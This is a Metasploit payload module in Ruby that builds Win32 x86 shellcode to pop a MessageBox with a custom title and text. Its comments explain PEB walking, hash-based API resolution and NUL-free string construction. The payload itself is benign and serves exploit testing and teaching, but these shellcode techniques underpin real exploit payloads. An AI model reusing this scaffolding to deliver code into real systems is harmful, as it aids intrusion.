# Title : Shellcode - Win32 MessageBox (Metasploit module)
# Published : 2010-03-24
# Author : corelanc0d3r
##
# $Id: messagebox.rb 4 2010-02-26 00:28:00:00Z corelanc0d3r & rick2600 $
##
#
# Installation instructions :
# Save this file as messagebox.rb in the framework3/modules/payloads/singles/windows folder;
# that is what makes it available as the windows/messagebox payload used in the usage line below
#
# Usage : ./msfpayload windows/messagebox TITLE="Corelan" TEXT="Greetz to corelanc0d3r" P
#
require 'msf/core'
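module Metasploit3

  include Msf::Payload::Windows
  include Msf::Payload::Single

  # Each string is NUL-terminated at run time with
  #   mov byte [esp+disp8], reg8     ; 88 5C 24 <disp8>  /  88 4C 24 <disp8>
  # disp8 is a *signed* 8-bit displacement, so the terminator index (which
  # equals the string's byte length) must not exceed 0x7f.  A larger value
  # is sign-extended, the zero lands below esp and the string is never
  # terminated -- the former "max 255 chars" limit produced broken shellcode
  # for anything between 128 and 254 bytes, and TEXT was not checked at all.
  MAX_STRING_BYTES = 127

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Windows Messagebox with custom title and text',
      'Version'     => '$Revision: 4 $',
      'Description' => 'Spawns MessageBox with a customizable title & text',
      'Author'      => [ 'corelanc0d3r - peter.ve[at]corelan.be',
                         'rick2600 - ricks2600[at]gmail.com' ],
      'License'     => BSD_LICENSE,
      'Platform'    => 'win',
      'Arch'        => ARCH_X86,
      'Privileged'  => false,
      'Payload'     =>
        {
          'Offsets' => { },
          # Position-independent prologue shared by every generated payload:
          #  - fldpi / fnstenv [esp-0xc] / pop ecx recovers the current eip
          #    (GetPC); `add ecx, 0x7a ; jmp ecx` then skips the resolver;
          #  - fs:[0x30] (PEB) -> Ldr -> InInitializationOrderModuleList is
          #    walked until a module whose 13th wide name character is NUL
          #    (i.e. a 12-character name such as kernel32.dll) is found; its
          #    DllBase is left in eax;
          #  - the export resolver (pushad ... popad ; ret) takes a module
          #    base and a ROR13 hash (ror edi, 13 = c1 cf 0d) from the stack
          #    and returns the export address in eax;
          #  - an 8-byte scratch area is set up at ebp, the export with hash
          #    0xec0e4e8e (LoadLibraryA, going by the hash) is stored in
          #    [ebp+4], and the stub ends on `mov ebx, imm32` (bb) so that
          #    the exit-function hash appended by #generate is its operand.
          # Relative call/jmp displacements inside the stub depend on this
          # exact byte layout; do not reorder or pad it.
          'Payload' =>
            "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31" +
            "\xd2\xb2\x7a\x31\xc9\x64\x8b\x71" +
            "\x30\x8b\x76\x0c\x8b\x76\x1c\x8b" +
            "\x46\x08\x8b\x7e\x20\x8b\x36\x38" +
            "\x4f\x18\x75\xf3\x59\x01\xd1\xff" +
            "\xe1\x60\x8b\x6c\x24\x24\x8b\x45" +
            "\x3c\x8b\x54\x05\x78\x01\xea\x8b" +
            "\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" +
            "\x37\x49\x8b\x34\x8b\x01\xee\x31" +
            "\xff\x31\xc0\xfc\xac\x84\xc0\x74" +
            "\x0a\xc1\xcf\x0d\x01\xc7\xe9\xf1" +
            "\xff\xff\xff\x3b\x7c\x24\x28\x75" +
            "\xde\x8b\x5a\x24\x01\xeb\x66\x8b" +
            "\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b" +
            "\x04\x8b\x01\xe8\x89\x44\x24\x1c" +
            "\x61\xc3\xb2\x08\x29\xd4\x89\xe5" +
            "\x89\xc2\x68\x8e\x4e\x0e\xec\x52" +
            "\xe8\x9c\xff\xff\xff\x89\x45\x04" +
            "\xbb"
        }
    ))

    # EXITFUNC: only Process and Thread are implemented by the stub, so the
    # generic option is replaced with a narrower one.
    deregister_options('EXITFUNC')

    register_options(
      [
        OptString.new('EXITFUNC', [ false,
          "Only Process (default) or Thread are supported", "process" ]),
        OptString.new('TITLE', [ true,
          "Messagebox Title (max #{MAX_STRING_BYTES} bytes)" ]),
        OptString.new('TEXT', [ true,
          "Messagebox Text (max #{MAX_STRING_BYTES} bytes)" ])
      ], self.class)
  end

  #
  # Constructs the payload.
  #
  # Code emitted after the prologue taken from module_info:
  #   mov ebx, <exit hash> ; xchg [esp], ebx ; push edx ; call resolver
  #   mov [ebp+8], eax                        ; ExitProcess / ExitThread
  #   push "user32.dll" ; mov esi, esp ; push esi ; call [ebp+4]
  #   mov edx, eax ; push eax ; mov ebx, 0xbc4da2a8 ; xchg [esp], ebx
  #   push edx ; call resolver                ; eax = MessageBoxA (by hash)
  #   <TITLE on the stack, NUL-terminated, address in ebx>
  #   <TEXT  on the stack, NUL-terminated, address in ecx>
  #   xor edx, edx ; push edx ; push ebx ; push ecx ; push edx ; call eax
  #                                           ; MessageBoxA(0, text, title, 0)
  #   xor eax, eax ; push eax ; call [ebp+8]  ; exit function(0)
  #
  # NUL bytes inside TITLE/TEXT are not filtered; they are copied into the
  # generated code verbatim (and would truncate the displayed string).
  #
  # @return [String] the raw x86 shellcode as a binary string
  # @raise [ArgumentError] if TITLE or TEXT is missing or longer than
  #   MAX_STRING_BYTES
  #
  def generate
    exit_hash = exit_function_hash(datastore['EXITFUNC'])

    # The title is addressed through ebx, the text through ecx: the NUL
    # writes use bl / cl and the trailing `mov reg, esp` records the address.
    title_stub = string_stub(datastore['TITLE'], 'TITLE',
                             "\x31\xdb\x88\x5c\x24", "\x89\xe3")
    text_stub  = string_stub(datastore['TEXT'], 'TEXT',
                             "\x31\xc9\x88\x4c\x24", "\x89\xe1")

    pieces = [
      module_info['Payload']['Payload'],
      exit_hash,                                # operand of the trailing `mov ebx,`
      "\x87\x1c\x24",                           # xchg [esp], ebx (hash <-> kernel32 base)
      "\x52\xe8\x8b\xff\xff\xff",               # push edx ; call resolver
      "\x89\x45\x08",                           # mov [ebp+8], eax  (exit function)
      "\x68\x6c\x6c\x20\xff",                   # push "ll \xff"  \
      "\x68\x33\x32\x2e\x64",                   # push "32.d"      | "user32.dll"
      "\x68\x75\x73\x65\x72",                   # push "user"     /
      "\x88\x5c\x24\x0a",                       # mov [esp+0xa], bl -> NUL (bl = low byte of the kernel32 base, 0)
      "\x89\xe6\x56\xff\x55\x04",               # mov esi, esp ; push esi ; call [ebp+4]
      "\x89\xc2\x50",                           # mov edx, eax ; push eax  (user32 base)
      "\xbb\xa8\xa2\x4d\xbc",                   # mov ebx, 0xbc4da2a8      (MessageBoxA hash)
      "\x87\x1c\x24\x52\xe8\x5e\xff\xff\xff",   # xchg [esp], ebx ; push edx ; call resolver
      title_stub,
      text_stub,
      "\x31\xd2\x52",                           # xor edx, edx ; push edx         (uType = 0)
      "\x53\x51\x52\xff\xd0",                   # push ebx ; push ecx ; push edx ; call eax
      "\x31\xc0\x50\xff\x55\x08"                # xor eax, eax ; push eax ; call [ebp+8]
    ]

    # Assemble from raw bytes so that string encodings never interfere:
    # the opcode literals are binary, the user-supplied strings may be UTF-8.
    pieces.inject([]) { |acc, s| acc.concat(s.unpack('C*')) }.pack('C*')
  end

  private

  # ROR13 hash of the kernel32 export the stub calls once the message box is
  # dismissed.  "thread" (case-insensitive) selects ExitThread; anything else
  # -- nil, the default "process", or an unsupported value -- falls back to
  # ExitProcess, as the original implementation did.
  def exit_function_hash(exitfunc)
    if exitfunc.to_s.downcase == 'thread'
      "\xEF\xCE\xE0\x60"  # ExitThread()
    else
      "\x7e\xd8\xe2\x73"  # ExitProcess()
    end
  end

  # Builds the instructions that leave a NUL-terminated copy of +str+ at
  # [esp].  The string is laid out as str + "X" + space padding up to a
  # multiple of four bytes, pushed four bytes at a time from the end (so it
  # reads forwards in memory), and the "X" placeholder is overwritten with a
  # zero at run time -- this keeps NUL bytes out of the generated code.
  #
  # @param str       [String, nil] user-supplied option value
  # @param name      [String] option name, for error messages
  # @param nul_write [String] opcodes for `xor r32, r32 ; mov [esp+` -- the
  #   disp8 (index of the placeholder) is appended here
  # @param save_esp  [String] opcodes for `mov r32, esp`
  # @return [String] the stub as a binary string
  # @raise [ArgumentError] if +str+ is nil or longer than MAX_STRING_BYTES
  def string_stub(str, name, nul_write, save_esp)
    raise ArgumentError, "#{name} is required" if str.nil?

    data = str.unpack('C*')
    if data.length > MAX_STRING_BYTES
      raise ArgumentError,
            "#{name} must be #{MAX_STRING_BYTES} bytes or less (got #{data.length})"
    end

    nul_index = data.length                    # placeholder sits right after the text
    data << 0x58                               # 'X', replaced by 0x00 at run time
    data << 0x20 until data.length % 4 == 0    # pad with spaces to a dword boundary

    stub = []
    data.each_slice(4).to_a.reverse_each do |dword|
      stub << 0x68                             # push imm32
      stub.concat(dword)
    end
    stub.concat(nul_write.unpack('C*'))
    stub << nul_index                          # disp8 of the NUL write (<= 0x7f)
    stub.concat(save_esp.unpack('C*'))
    stub.pack('C*')
  end

end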